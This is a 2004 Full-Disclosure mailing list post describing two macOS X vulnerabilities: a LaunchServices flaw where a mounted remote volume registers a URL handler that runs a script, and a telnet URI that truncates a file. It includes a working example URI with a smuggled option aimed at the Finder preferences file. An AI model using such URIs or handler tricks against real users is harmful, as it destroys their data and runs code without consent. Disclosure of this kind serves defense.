[Full-Disclosure] Exploit different

Rosalina Hamar rosalina@linuxmail.org
Sat, 22 May 2004 19:42:36 +0800


Apple released a fix for the Help Viewer Problem described by lixlpixel.
But during different tests some really serious problems turned out.

1) MacOS X LaunchService Vunerability
Mount a FTP/DAV/SMB/AFS-Volume with an application in it
which registers a new protocol handler i.e. test:, and if that
handler is called, the script will be executed.

Example from Info.plist:
[...]
<key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key>
        <string>Test</string>
          <key>CFBundleURLSchemes</key>
            <array>
               <string>test</string>
             </array>
      </dict>
   </array>
[...]

Demo: http://rosa.base-industries.net/
More Infos:
-http://www.unsanity.com/haxies/pa/whitepaper
- http://forums.macnn.com/showthread.php?s=&threadid=213043&perpage=50&pagenumber=1

2) Telnet URI Handler File Creation/Truncation Vulnerability
It is possible to wipe/zeroing a file using a telnet URI.

Example: telnet://-nlibrary%2Fpreferences%2Fcom.apple.finder.plist

This effects all browsers which are passing telnet URIs back the
LaunchServices (thanks to fukami to make this clear to me).

More Infos: http://daringfireball.net/2004/05/telnet_protocol
 
Jason Harris from Unsanity provided a haxie called Paranoid Android
which pops up when a weird protocol handler is called.
PA can be found here: http://www.unsanity.com/haxies/pa/


"Even the exploits are user friendly" (mcgroarty on slashdot)

 Rosa

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze